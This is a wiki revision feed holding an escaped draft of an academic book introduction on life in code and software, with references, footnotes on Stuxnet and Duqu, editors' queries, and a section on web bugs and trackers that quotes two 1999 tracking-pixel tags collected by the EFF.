&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4694</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4694"/>
		<updated>2012-04-18T13:28:37Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
